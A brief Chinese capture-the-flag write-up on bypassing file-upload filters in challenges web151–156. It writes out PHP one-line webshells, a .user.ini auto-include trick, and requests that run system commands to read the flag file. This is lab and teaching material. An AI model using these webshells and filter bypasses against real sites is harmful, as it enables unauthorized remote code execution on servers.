目录
web151
上传提示,前端验证
上传.jpg文件然后抓包,改文件名为.php,加入一句话木马。
upload/1.php?1=system("cat /var/www/html/flag.php");
web 152
同上,但对Content-Type进行了过滤。
upload/1.php?1=system("cat /var/www/html/flag.php");
web 153
过滤了php,大小写改一下就行了,但这种没用,原因是无法解析为php
可以用.user.ini
使得每个文件前包含我们的png,因为upload下有一个index.php,通过.user.ini
来是每个文件PHP
包含我们所指定的文件。
(前端验证要改一下)
upload/index.php?1=system("cat ../flag.php");
web 154
同上题目,但过滤了内容,内容不能有php
<?=eval($_GET[1]);?>
web 155
同上
web 156
同上,但是内容过滤多了一项,对[]进行了过滤,可以用{}代替。
<?=eval($_GET{1});?>